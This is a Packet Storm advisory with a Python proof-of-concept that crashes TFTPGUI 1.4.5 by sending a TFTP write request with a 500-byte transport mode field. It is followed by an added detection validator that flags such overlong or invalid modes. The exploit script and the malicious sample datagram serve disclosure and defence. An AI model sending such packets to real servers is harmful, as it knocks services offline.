TFTPGUI Long Transport Mode Overflow

2010-05-03T00:00:00
ID PACKETSTORM:89112
Type packetstorm
Reporter Jeremiah Talamantes
Modified 2010-05-03T00:00:00

Description

                                        
`# Exploit Title: TFTPGUI Long Transport Mode Overflow  
# Date: 5/1/2010  
# Author: Jeremiah Talamantes  
# Software Link: http://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download  
# Version: 1.4.5  
# Tested on: Windows XP, SP2 (En)  
# CVE : N/A  
  
#!/usr/bin/python  
print "\n#################################################################"  
print "## RedTeam Security ##"  
print "## TFTPGUI Long Transport Mode Overflow ##"  
print "## Version 1.4.5 ##"  
print "## LIST Vulnerability ##"  
print "## ##"  
print "## Jeremiah Talamantes ##"  
print "## labs@redteamsecure.com ##"  
print "################################################################# \n"  
  
import socket  
import sys  
  
# Change these values to suit your needs  
host = '192.168.1.108'  
port = 69  
  
try:  
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
except:  
    print "Error: unable to connect."  
    sys.exit(1)  
  
# Creating the overly long transport mode string   
fn = "A"  
md = "A" * 500  
stuff = "\x00\x02" + fn + "\0" + md + "\0"  
  
# Send data  
s.sendto(stuff, (host, port))  
print "Check to see if TFTPGUI is still running..."  
  
# End  
`
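
For detection, the request above differs from a normal write request only in its transport mode field, which RFC 1350 limits to `netascii`, `octet` or `mail`. The validator below is an added example, not part of the original advisory; its function and constant names and both sample datagrams are constructed for illustration.

```python
import struct

# RFC 1350 request opcodes and the three transfer modes it defines.
OP_RRQ, OP_WRQ = 1, 2
VALID_MODES = {b"netascii", b"octet", b"mail"}
MAX_MODE_LEN = max(len(m) for m in VALID_MODES)  # 8 bytes


def check_tftp_request(payload):
    """Return a list of findings for one UDP payload sent to port 69.

    An empty list means the datagram is a well-formed RRQ/WRQ.
    """
    findings = []
    if len(payload) < 4:
        return ["truncated: shorter than the smallest possible request"]
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        return ["not a read/write request (opcode %d)" % opcode]
    if payload[-1:] != b"\x00":
        findings.append("last field is not NUL-terminated")
    # Fields are NUL-separated: filename, mode, then optional RFC 2347 options.
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3:
        findings.append("fewer than two NUL-terminated fields")
        return findings
    filename, mode = fields[0], fields[1]
    if not filename:
        findings.append("empty filename")
    if len(mode) > MAX_MODE_LEN:
        findings.append("mode field is %d bytes (longest valid mode is %d)"
                        % (len(mode), MAX_MODE_LEN))
    if mode.lower() not in VALID_MODES:  # mode names are case-insensitive
        findings.append("mode is not netascii, octet or mail")
    return findings


# Constructed sample datagrams (not captured traffic).
BENIGN_WRQ = b"\x00\x02" + b"backup.cfg\x00" + b"octet\x00"
# Same layout as the request built by the script above:
# 1-byte filename followed by a 500-byte mode string.
OVERLONG_MODE_WRQ = b"\x00\x02" + b"A\x00" + b"A" * 500 + b"\x00"

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN_WRQ), ("overlong", OVERLONG_MODE_WRQ)):
        print(name, check_tftp_request(pkt) or "ok")
```

The same two checks (mode length and mode value) are what a fixed server would enforce before copying the field, and they translate directly into an IDS rule on UDP port 69.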